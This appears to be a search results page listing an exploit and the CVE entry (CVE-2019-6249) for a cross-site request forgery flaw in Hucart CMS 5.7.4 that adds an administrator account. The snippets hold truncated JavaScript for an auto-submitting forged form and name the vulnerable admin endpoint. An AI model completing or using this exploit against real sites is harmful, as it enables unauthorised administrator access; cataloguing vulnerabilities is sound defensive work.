3 matches found
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
Hucart CMS 5.7.4 - Cross-Site Request Forgery Add Administrator Account function posturl,fields var p = document.createElement"form"; p.action = url; p.innerHTML = fields; p.target = "self"; p.method = "post"; document.body.appendChildp; p.submit; function csrfhack var fields; fields += ""; field...
Hucart CMS 5.7.4 - Cross-Site Request Forgery (Add Administrator Account)
function posturl,fields var p = document.createElement"form"; p.action = url; p.innerHTML = fields; p.target = "self"; p.method = "post"; document.body.appendChildp; p.submit; function csrfhack var fields; fields += ""; fields += ""; fields += ""; fields += ""; fields += ""; fields += ""; fields ...
CVE-2019-6249
CVE-2019-6249 : HuCart v5.7.4 contains a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to add an administrator account via the request /adminsys/index.php?load=admins&act=edit_info&act_type=add. This affects HuCart 5.7.4 as described in multiple sources (NVD entry and CN...